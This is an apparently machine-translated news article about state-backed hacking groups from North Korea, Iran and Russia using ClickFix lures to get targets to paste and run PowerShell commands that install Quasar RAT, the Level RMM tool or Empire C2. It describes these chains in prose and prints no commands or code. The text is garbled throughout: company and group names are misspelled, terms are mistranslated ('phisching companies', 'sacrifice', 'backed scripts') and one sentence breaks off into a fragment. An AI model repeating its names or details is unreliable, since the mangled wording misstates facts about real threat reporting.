Several hacking groups funded by the state from Iran, North Korea and Russia have been found to use the increasingly popular CLICFIX social engineering tactics to deploy malware over three months from the end of 2024 to early 2025.
Phisching companies taking strategy were attributed to clusters tracking Ta427 (Kimusuki), Ta450 (AKA MUDDYWATER, UNK_REMOTEROGE, and Ta422 (AKA APT28).
Clickfix was the initial access methodology, primarily related to cybercrime groups, although the effectiveness of the approach also led to the adoption of nation -states.
“Inclusion Clickfix does not revolutionize companies conducted by TA427, Ta450, Unk_remoterogue and Ta422, and instead replaces the installation and execution stages in existing infection,” “A company involved – Note In a report published today.
ClickfixIn a nutshell, it refers to the undercurrent equipment that calls on users to infect their own machine by following a number of copying instructions, insertion and launch malicious commands under the pretext of solving the problem, completing the CAPTCHA check or registering their device.
Proufpoint said he first discovered Kimsuk using ClickFix in January and February 2025 as part of a phishing company that sent people in less than five organizations in the analytical centers sector.
“Ta427 came into original contact for the purpose of a meeting request with The fake sender Delivered to the traditional TA427 goals working on North Korea’s affairs, “the PROFPOINT research team said.
“After a brief conversation, to attract the goal and build confidence, as is often observed in TA427, the attackers sent the goal on the site controlled by the attacker where they convinced the purpose of launching the PowerShell command.”
The company explained the attack chain, initiated a multi -stage sequence, which ended with the deployment of the Trojan access with the open source, which was called Quasar Rat.
The e -mail message is supposed to have come from a Japanese diplomat and asked the recipient to organize a meeting with the Japanese ambassador to the United States. During the conversation, the threatening actors sent a malicious PDF, which contained a link to another document with a list of issues that would be discussed during the meeting.
By clicking on a link aimed at the sacrifice on a fake target page that imitates the Japanese embassy site, which pushed them to register their device by copying and inserting the command into the Windows launch dialog to download the questionnaire.
“The Clickfix PowerShell team receives and performs the second remote command PowerShell, which reflected the PDF user specified earlier in the chain (questionnaire.pdf),” PrououfPoint said. “The document is said to be in the Ministry of Foreign Affairs in Japan and contained issues concerning the proliferation and nuclear nuclear policy in northeast Asia.”
The second PowerShell scenario is set up to create a visual basic scenario that runs every 19 minutes with a planned task, which, in turn, downloads two backed scripts that create, decipher and perform a useful load of Quasar Rat. It is worth noting that changing this attack chain Previously documented From Microsoft in February 2025.
The second group of nation -state that is fastened on Clickfix Level To maintain constant access.
Phishing emails sent on 13 and 14 November 2024, coincided with Microsoft patch on Tuesday Updates, masking as a security giant upgrade, asking the recipients of messages to follow the Clickfix style instructions to address the alleged vulnerability.
“The attackers opened ClickFix technique, convincing the goal first launch the PowerShell with the administrator’s privileges, and then copy and run the command contained in the email housing,” ProufPoint said.
“The team is responsible for installing remote and monitoring software (RMM) – in this case the level – after which TA450 operators will abuse the RMM tool for spying and operating data from Target.”
TA450 ClickFix is said to be aimed at financing, government, health care, education and transport in the Middle East, with a focus on the United Arab Emirates (UAE) and Saudi Arabia, as well as those in Canada, Germany, Switzerland and the USA.
Also noted by planting in Blickfix Bandwagon is a suspected Russian group tracked as unk_remoterogue by the end of last year, using baits sent from the probable Zimbra servers that included a link to Microsoft Office document.
Visiting the link is displayed by a page containing a code copying instructions from the browser to their terminal as well as video -lesson on YouTube on how to run PowerShell. The PowerShell team was equipped with the JavaScript running options that performed the PowerShell code associated with the Empire Command and Control (C2) framework.
Proufpoint said the company had sent 10 reports to individuals in two organizations related to a large weapon manufacturer in the defense industry. It was also found that unk_remoterogue shares infrastructure overlapping Another phishing company This is aimed at defending and aerospace structure with references to a permanent conflict in Ukraine to gather the powers of the web storage through fake entry pages.
“Numerous examples of state subjects that support the state have shown not only the popularity of technology among state subjects, but also its use by different countries within a few weeks from each other,” the company said. “Although not steadily used technique, it is likely that more threats from North Korea, Iran and Russia have also tried and experience clickfix or soon.”
